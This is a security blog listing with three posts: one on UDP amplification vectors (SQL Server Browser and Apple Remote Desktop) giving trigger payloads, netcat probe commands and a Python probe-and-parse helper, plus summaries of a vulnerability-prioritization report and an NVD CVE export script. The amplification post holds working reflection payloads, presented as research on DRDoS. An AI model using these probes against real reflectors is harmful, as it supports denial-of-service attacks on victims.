Showing posts with label [VulnResearch].

Oct 12, 2022

Amplification Research

AMP-Research is a research project on exotic UDP/TCP amplification vectors, their trigger payloads, and mitigations.

Amplification occurs when a small, often malformed, request elicits a response that is larger than the input. Because UDP does not verify the source address, an attacker can spoof the victim's IP as the source and have the reflecting service deliver the amplified response to the victim; this is the basis of Distributed Reflected Denial of Service (DRDoS) attacks, and with many reflectors and many spoofed sources it becomes a DDoS.

The clearest way to show what this means is the SQL Server Browser service (SQL Server Resolution Protocol, SSRP) on UDP port 1434, which gives roughly a 23x amplification factor. A single 0x02 byte, the SSRP CLNT_BCAST_EX request, makes the server reply with a SVR_RESP listing every SQL Server instance on the host:

$ echo -ne '\x02' | nc -u -q 2 190.xx.xx.xx 1434 | wc -c
629

That is 629 bytes of UDP payload in exchange for 1 byte. Amplification factors are normally quoted on bytes on the wire, and each datagram also carries a 20-byte IPv4 header and an 8-byte UDP header, so the ratio is (629 + 28) / (1 + 28), about 23. Note that piping the reply through xxd -p before wc -c, as is often done, counts hex characters and newlines rather than bytes, so the count has to be taken on the raw output.

Another example, against an Apple Remote Desktop (ARD) listener on UDP port 3283, where a 5-byte request returns a response of at least 272 bytes (the dump below runs to offset 0x100; hexdump prints * for a suppressed run of identical lines):

$ echo -ne '\x00\x14\x00\x01\x03' |nc -u 89.xx.xx.xx 3283|hexdump
0000000 0100 ea03 3100 0000 0000 0000 0000 0000
0000010 0000 0000 0000 0000 0000 0000 0000 0000
0000020 0000 0000 0000 0000 0100 0000 0000 0000
0000030 0000 0000 0000 0000 0000 0000 0000 0000
*
0000050 0000 1200 0000 0000 0000 0000 0000 0000
0000060 0000 0000 0000 0000 0000 0000 0000 0000
0000070 0000 0000 0000 0000 0000 0000 0000 640a
0000080 7461 6861 6565 6472 0034 0000 0000 0000
0000090 0000 0000 0000 0000 0000 0000 0000 0000
*
00000c0 0000 0001 0000 0000 0000 0000 0000 0000
00000d0 0000 0000 0000 9803 0000 0100 18f0 ed98
00000e0 9288 0000 0000 0a00 6400 6100 7400 6100
00000f0 6800 6500 6500 7200 6400 3400 0000 0000
0000100 0000 0000 0000 0000 0000 0000 0000 0000
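To make the measurement concrete, here is a small Python helper, added here as an example and not part of AMP-Research or the original post. It reproduces the amplification arithmetic for the two probes above (the 23x figure comes out of counting the 28 bytes of IPv4/UDP header on both the 1-byte request and the 629-byte reply), parses the SSRP SVR_RESP that a SQL Server Browser returns (0x05, 16-bit little-endian length, then key;value;...;; records), and wraps the raw UDP probe so the same numbers can be taken against a host you are authorised to test. The SVR_RESP sample is constructed, not captured, and the host name, instance names and ports in it are made up.

```python
import socket
from typing import Dict, List

# A single IPv4/UDP datagram carries 20 bytes of IP header and 8 bytes of UDP
# header in addition to its payload; amplification factors are usually quoted
# on total bytes on the wire, not on payload alone.
IPV4_UDP_HEADER = 20 + 8

# Probe payloads used in the post: the SSRP CLNT_BCAST_EX request (one byte)
# for SQL Server Browser on UDP/1434 and the five-byte ARD request on UDP/3283.
SSRP_PROBE = b"\x02"
ARD_PROBE = b"\x00\x14\x00\x01\x03"


def amplification_factor(request: bytes, response_len: int, on_wire: bool = True) -> float:
    """Bytes returned per byte sent. With on_wire=True both sides include the
    28-byte IPv4+UDP header, assuming the response fits in one datagram."""
    overhead = IPV4_UDP_HEADER if on_wire else 0
    return (response_len + overhead) / (len(request) + overhead)


def parse_svr_resp(data: bytes) -> List[Dict[str, str]]:
    """Parse an SSRP SVR_RESP: 0x05, 16-bit little-endian length, then ASCII
    'key;value;...;;' records, one per SQL Server instance."""
    if len(data) < 3 or data[0] != 0x05:
        raise ValueError("not an SSRP SVR_RESP")
    size = int.from_bytes(data[1:3], "little")
    if len(data) - 3 < size:
        raise ValueError("truncated SVR_RESP: declared %d, got %d" % (size, len(data) - 3))
    body = data[3:3 + size].decode("ascii", errors="replace")
    instances = []
    for record in filter(None, body.split(";;")):
        fields = record.split(";")
        # Each record is a key;value sequence; zip drops a dangling trailing key.
        instances.append(dict(zip(fields[0::2], fields[1::2])))
    return instances


def probe_udp(host: str, port: int, payload: bytes, timeout: float = 2.0) -> bytes:
    """Send one datagram and collect everything that comes back before the
    timeout (some services answer with several datagrams). Only use against
    hosts you are authorised to test."""
    out = b""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(payload, (host, port))
        try:
            while True:
                chunk, _ = s.recvfrom(65535)
                out += chunk
        except socket.timeout:
            pass
    return out


# Constructed SVR_RESP with two instances; no real host was queried and the
# names and ports are invented.
_SAMPLE_BODY = (
    b"ServerName;SQLHOST;InstanceName;MSSQLSERVER;IsClustered;No;"
    b"Version;15.0.2000.5;tcp;1433;;"
    b"ServerName;SQLHOST;InstanceName;SQLEXPRESS;IsClustered;No;"
    b"Version;15.0.2000.5;tcp;49712;;"
)
SAMPLE_SVR_RESP = b"\x05" + len(_SAMPLE_BODY).to_bytes(2, "little") + _SAMPLE_BODY


if __name__ == "__main__":
    for inst in parse_svr_resp(SAMPLE_SVR_RESP):
        print(inst["InstanceName"], inst["tcp"])
    # 1-byte request, 629-byte reply as measured in the post: about 23x on the wire.
    print(round(amplification_factor(SSRP_PROBE, 629), 1))
    # Live measurement (uncomment with a host you own):
    # reply = probe_udp("192.0.2.10", 1434, SSRP_PROBE)
    # print(len(reply), amplification_factor(SSRP_PROBE, len(reply)))
```

The on_wire flag matters when comparing against published figures: the same 1-byte/629-byte exchange is a 629x payload ratio but a 23x wire ratio, and it is the wire ratio that determines how much traffic a reflector actually puts on the victim's link.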



Sep 1, 2021

Analyzing Vulnerability Remediation Strategies

Prioritization to Prediction Volume 1: Analyzing Vulnerability Remediation Strategies


Effective remediation depends on quickly determining which vulnerabilities warrant action and which of those have the highest priority, yet prioritization remains one of the biggest challenges in vulnerability management.

For the first time, Kenna Security and the Cyentia Institute have taken a quantitative look at the effectiveness of common remediation strategies and used that data as a baseline against which to compare a predictive model.

The results of this research are detailed in the new report, Prioritization To Prediction: Analyzing Vulnerability Remediation Strategies.

  1. Vulnerability Lifecycle
  2. Vulnerability Prioritization
  3. Exploitation Timeline
  4. Exploit Prediction Model


Apr 22, 2021

What Happened in the Past 14 Days?

Do you know how many new CVEs have been added to NVD in the past two weeks? And how many old CVEs have been updated, for example because a new PoC exploit or a piece of malware was released for them? What about ransomware and crypto-mining attacks?

The answer: 10,768 CVEs have been updated.

10,768 CVEs updated in the past 14 days

This includes:

  • New CVEs that have been released.
  • Old CVEs for which new details have been released.
  • Any pre-NVD vulnerabilities (reported before an NVD record exists).

Yes, you can get this information from the National Vulnerability Database. However, how are you going to do a quick analysis across all of those CVEs, answering questions like:

  • What are the trend and velocity of attacks against a particular CVE right now?
  • Which new exploits have been released?
  • Has any malware or ransomware been released for a CVE?
  • Is there any prediction, from artificial-intelligence analysis, of how likely a particular CVE is to be exploited in the future?

Finally, how fast do you learn about all of these new CVEs, attacks, ransomware and crypto-mining campaigns?

(Below is a quick dump of all the information above into a CSV file. It just happened that while I was exporting the CSV, the list grew to 10,769 CVEs.)

10,769 CVEs exported
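The count-and-export step above can be reproduced directly against NVD. The script below is an added example, not the author's tooling: it builds the NVD CVE API 2.0 query for records modified in the last 14 days (lastModStartDate/lastModEndDate, paged with startIndex/resultsPerPage), flattens each returned vulnerability into the columns a triage sheet needs, splits the result into "new" CVEs (published inside the window) versus old CVEs that were only updated, and writes the CSV. The JSON response embedded here is constructed to match the API's documented shape; the two CVE IDs in it are placeholders, not real records, and the fetch itself is left to the reader so the example runs offline.

```python
import csv
import io
import json
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlencode

NVD_CVES_API = "https://services.nvd.nist.gov/rest/json/cves/2.0"


def nvd_last_modified_url(days: int = 14, start_index: int = 0, per_page: int = 2000,
                          now: Optional[datetime] = None) -> str:
    """Query URL for CVEs whose NVD record changed in the last `days` days.
    NVD caps resultsPerPage at 2000 and a lastMod window at 120 days; walk
    startIndex until it passes totalResults to get everything."""
    now = now or datetime.now(timezone.utc).replace(tzinfo=None)
    fmt = "%Y-%m-%dT%H:%M:%S.000"          # ISO-8601 with milliseconds, UTC
    params = {
        "lastModStartDate": (now - timedelta(days=days)).strftime(fmt),
        "lastModEndDate": now.strftime(fmt),
        "resultsPerPage": per_page,
        "startIndex": start_index,
    }
    return NVD_CVES_API + "?" + urlencode(params)


FIELDS = ["cve", "published", "lastModified", "new", "cvss", "severity", "status", "description"]


def rows_from_response(payload: dict, window_start: datetime) -> List[Dict[str, str]]:
    """Flatten one page of the API response. A CVE is 'new' if it was first
    published inside the window; otherwise it is an old record that was updated."""
    rows = []
    for item in payload.get("vulnerabilities", []):
        cve = item["cve"]
        desc = next((d["value"] for d in cve.get("descriptions", []) if d["lang"] == "en"), "")
        score, severity = "", ""
        metrics = cve.get("metrics", {})
        # Prefer CVSS v3.1, then v3.0, then v2. v3 keeps baseSeverity inside
        # cvssData, v2 keeps it beside it, so look in both places.
        for key in ("cvssMetricV31", "cvssMetricV30", "cvssMetricV2"):
            if metrics.get(key):
                entry = metrics[key][0]
                score = str(entry["cvssData"]["baseScore"])
                severity = entry["cvssData"].get("baseSeverity") or entry.get("baseSeverity", "")
                break
        published = datetime.fromisoformat(cve["published"])
        rows.append({
            "cve": cve["id"],
            "published": cve["published"],
            "lastModified": cve["lastModified"],
            "new": "yes" if published >= window_start else "no",
            "cvss": score,
            "severity": severity,
            "status": cve.get("vulnStatus", ""),
            "description": " ".join(desc.split()),   # one line per row
        })
    return rows


def count_new_vs_updated(rows: List[Dict[str, str]]) -> Tuple[int, int]:
    new = sum(1 for r in rows if r["new"] == "yes")
    return new, len(rows) - new


def to_csv(rows: List[Dict[str, str]]) -> str:
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=FIELDS, lineterminator="\n")
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


# Constructed response in the NVD API 2.0 layout. Placeholder IDs, not real CVEs.
SAMPLE_RESPONSE = json.loads("""{
  "resultsPerPage": 2, "startIndex": 0, "totalResults": 2,
  "vulnerabilities": [
    {"cve": {"id": "CVE-0000-00001", "published": "2021-04-15T10:00:00.000",
             "lastModified": "2021-04-20T12:00:00.000", "vulnStatus": "Analyzed",
             "descriptions": [{"lang": "en", "value": "Constructed sample: new CVE.\\nSecond line."}],
             "metrics": {"cvssMetricV31": [{"cvssData": {"baseScore": 9.8, "baseSeverity": "CRITICAL"}}]}}},
    {"cve": {"id": "CVE-0000-00002", "published": "2019-03-01T00:00:00.000",
             "lastModified": "2021-04-18T09:30:00.000", "vulnStatus": "Modified",
             "descriptions": [{"lang": "en", "value": "Constructed sample: old CVE updated."}],
             "metrics": {"cvssMetricV2": [{"cvssData": {"baseScore": 7.5}, "baseSeverity": "HIGH"}]}}}
  ]}""")


if __name__ == "__main__":
    now = datetime(2021, 4, 22)
    print(nvd_last_modified_url(14, now=now))
    rows = rows_from_response(SAMPLE_RESPONSE, now - timedelta(days=14))
    print("new=%d updated=%d" % count_new_vs_updated(rows))
    print(to_csv(rows))
```

To run it for real, fetch each page of nvd_last_modified_url(14, start_index=i) with your HTTP client of choice (an NVD API key raises the rate limit), pass the parsed JSON to rows_from_response with the same window start, and keep incrementing start_index by resultsPerPage until it reaches totalResults; the concatenated rows are the 14-day dump the post describes.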